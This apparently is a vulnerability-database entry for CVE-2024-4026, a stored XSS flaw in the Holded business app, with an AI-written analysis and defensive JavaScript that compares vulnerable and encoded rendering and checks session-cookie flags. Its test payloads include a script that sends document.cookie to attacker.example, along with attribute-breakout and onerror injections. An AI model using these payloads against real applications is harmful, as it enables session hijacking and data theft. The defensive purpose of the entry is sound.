VYPR
Medium severity · 4.6 · NVD Advisory · Published Apr 22, 2024 · Updated Apr 15, 2026

CVE-2024-4026

Description

Cross-Site Scripting (XSS) vulnerability in the Holded application. This vulnerability could allow an attacker to store a JavaScript payload within all editable parameters within the 'General' and 'Team ID' functionalities, which could result in a session takeover.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in the Holded application allows session takeover via the editable parameters of the 'General' and 'Team ID' functionalities.

Vulnerability

CVE-2024-4026 is a stored Cross-Site Scripting (XSS) vulnerability in Holded, a cloud business-management application aimed at SMEs. Values entered in any editable parameter of the 'General' and 'Team ID' functionalities are stored and later rendered back into the page without adequate sanitization or output encoding, so an attacker can persist a JavaScript payload that runs for anyone who views the affected page [1].

Exploitation

The CVSS v3.1 vector, CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N (base score 4.6), describes the preconditions. The attacker reaches the application over the network (AV:N) with no special conditions (AC:L) and needs only a low-privileged account (PR:L), enough to edit the affected settings and store the payload. Because the payload is stored, it fires whenever another user loads the page that renders the tampered value; that required victim action is the UI:R component. The script then executes in the victim's browser, in the origin of the Holded application, with whatever access that user's session carries [1]. Scope is unchanged (S:U): the effect stays within the vulnerable application.
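As an added illustration (not Holded's code; the advisory publishes no source), the following JavaScript models the pattern the advisory describes: a hypothetical team-settings page that writes two stored, user-editable values back into HTML, once without encoding and once with output encoding at each interpolation point. It then runs constructed payloads for both the text context (the heading) and the attribute context (the input value) through a small start-tag tokenizer and reports any tag or attribute the template did not emit itself. The field names, the template, the payloads and the attacker.example host are all assumptions of this example.

```javascript
// Added example, not Holded's code. A hypothetical "Team" settings page with
// two stored, user-editable values: a display name (HTML text context) and a
// team identifier (quoted attribute context).

const STORED_TEAM = { name: 'Sales', teamId: 'team-42' }; // constructed sample record

// Encode the five characters that can change HTML structure in text or in
// double/single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: stored values are interpolated unencoded.
function renderTeamPageVulnerable(team) {
  return `<h1>${team.name}</h1>\n<input name="teamId" value="${team.teamId}">`;
}

// Hardened: same template, every interpolation encoded at output time.
function renderTeamPageHardened(team) {
  return `<h1>${escapeHtml(team.name)}</h1>\n<input name="teamId" value="${escapeHtml(team.teamId)}">`;
}

// Minimal start-tag tokenizer for the rendered fragment. Quoted attribute values
// are treated as opaque, as a browser does, so a payload that survives only as
// text inside a quoted value is not counted as a tag or attribute.
function extractStartTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i += 1; continue; }
    let j = i + 1;
    const closing = html[j] === '/';
    if (closing) j += 1;
    const nameStart = j;
    while (j < html.length && /[A-Za-z0-9-]/.test(html[j])) j += 1;
    const tag = html.slice(nameStart, j).toLowerCase();
    if (!tag) { i = j; continue; } // a stray '<' is text, not a tag
    const attrs = [];
    while (j < html.length && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j += 1; continue; }
      const attrStart = j;
      while (j < html.length && !/[\s=>\/]/.test(html[j])) j += 1;
      const attr = html.slice(attrStart, j).toLowerCase();
      if (attr) attrs.push(attr);
      while (j < html.length && /\s/.test(html[j])) j += 1;
      if (html[j] === '=') {
        j += 1;
        while (j < html.length && /\s/.test(html[j])) j += 1;
        const quote = html[j];
        if (quote === '"' || quote === "'") {
          j += 1;
          while (j < html.length && html[j] !== quote) j += 1; // quoted value: opaque
          j += 1;
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) j += 1; // unquoted value
        }
      }
    }
    if (!closing) tags.push({ tag, attrs });
    i = j + 1;
  }
  return tags;
}

// Tags and attributes the template emits by itself; anything else came from stored data.
const TEMPLATE_SHAPE = new Map([['h1', new Set()], ['input', new Set(['name', 'value'])]]);

function findInjectedMarkup(html) {
  const findings = [];
  for (const { tag, attrs } of extractStartTags(html)) {
    const allowed = TEMPLATE_SHAPE.get(tag);
    if (!allowed) { findings.push(`unexpected tag <${tag}>`); continue; }
    for (const attr of attrs) {
      if (!allowed.has(attr)) findings.push(`unexpected attribute "${attr}" on <${tag}>`);
    }
  }
  return findings;
}

// Constructed payloads for both contexts, plus a benign value that must not be flagged.
const PAYLOADS = [
  { label: 'script tag in text context', field: 'name',
    value: '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>' },
  { label: 'event handler via img in text context', field: 'name',
    value: '<img src=x onerror=alert(document.cookie)>' },
  { label: 'attribute breakout in attribute context', field: 'teamId',
    value: '" autofocus onfocus="alert(document.cookie)' },
  { label: 'tag breakout from attribute context', field: 'teamId',
    value: '"><script>alert(1)</script>' },
  { label: 'benign punctuation (must not be flagged)', field: 'name',
    value: 'R&D "Alpha" & Partners' },
];

function runPayloads(render) {
  return PAYLOADS.map((p) => {
    const team = { ...STORED_TEAM, [p.field]: p.value };
    return { label: p.label, findings: findInjectedMarkup(render(team)) };
  });
}

function countFlagged(render) {
  return runPayloads(render).filter((r) => r.findings.length > 0).length;
}

for (const render of [renderTeamPageVulnerable, renderTeamPageHardened]) {
  console.log(render.name);
  for (const r of runPayloads(render)) console.log('  ', r.label, '->', r.findings.length ? r.findings : 'clean');
}
```

The tokenizer is the point of the check: a naive substring or regex search for `onfocus=` would still match the hardened output, because the encoded payload is present as text; only a parse that respects quoted values tells executable markup from inert text, which is also why the fix belongs at the output encoding step rather than in an input blocklist.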

Impact

Successful exploitation can lead to session hijacking, allowing the attacker to act as the victim. How far that goes depends on the session cookie: if script can read it (no HttpOnly flag), the payload can exfiltrate it and the attacker can reuse the session from their own machine; even if it cannot, the script can still issue authenticated requests from the victim's browser, changing settings or reading data as that user. CVSS rates the impact on confidentiality and integrity as Low (C:L, I:L) and on availability as None (A:N), which is what keeps the base score at 4.6 despite the session-takeover potential [1].
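Whether a stored payload can take over the session, and by which route, depends on how the session cookie is configured. The advisory says nothing about Holded's cookie settings, so the following check is a generic added example, not a description of Holded. Given the Set-Cookie headers from a login response and the session cookie's name (both constructed here), it reports which takeover routes remain open to script running in the victim's page.

```javascript
// Added example, not Holded's code: which session-takeover routes does a
// stored XSS payload have, given the cookies a login response sets?

// Parse one Set-Cookie header into its name and a lower-cased attribute map.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';');
  const eq = pair.indexOf('=');
  const name = (eq === -1 ? pair : pair.slice(0, eq)).trim();
  const attrs = {};
  for (const part of rest) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    if (key) attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name, attrs };
}

// Assess the named session cookie from a list of Set-Cookie headers.
function assessSessionCookie(setCookieHeaders, sessionCookieName) {
  const cookie = setCookieHeaders.map(parseSetCookie).find((c) => c.name === sessionCookieName);
  if (!cookie) return { found: false };
  const httpOnly = cookie.attrs.httponly === true;
  const secure = cookie.attrs.secure === true;
  return {
    found: true,
    // Without HttpOnly, document.cookie exposes the session id to the payload,
    // which can ship it to an attacker-controlled host for reuse elsewhere.
    cookieExfiltration: !httpOnly,
    // Script in the page can always send authenticated same-origin requests as
    // the victim; no cookie attribute closes this route, only fixing the XSS does.
    requestRiding: true,
    // Without Secure, the cookie also travels over plain HTTP.
    clearTextExposure: !secure,
  };
}

// Constructed sample responses (not captured from Holded).
const WEAK_LOGIN_RESPONSE = ['sid=7f3a9c; Path=/', 'lang=en; Path=/'];
const HARDENED_LOGIN_RESPONSE = ['sid=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax'];

console.log('weak:', assessSessionCookie(WEAK_LOGIN_RESPONSE, 'sid'));
console.log('hardened:', assessSessionCookie(HARDENED_LOGIN_RESPONSE, 'sid'));
```

Run it against the actual login response of the application under test; the useful output is the `requestRiding` field staying true for the hardened cookie, which is the reason cookie flags reduce but do not remove the session-takeover impact of a stored XSS.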

Mitigation

The vendor fixed the vulnerability in Holded version 4.20.0; users running earlier versions should update to that release or later [1].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
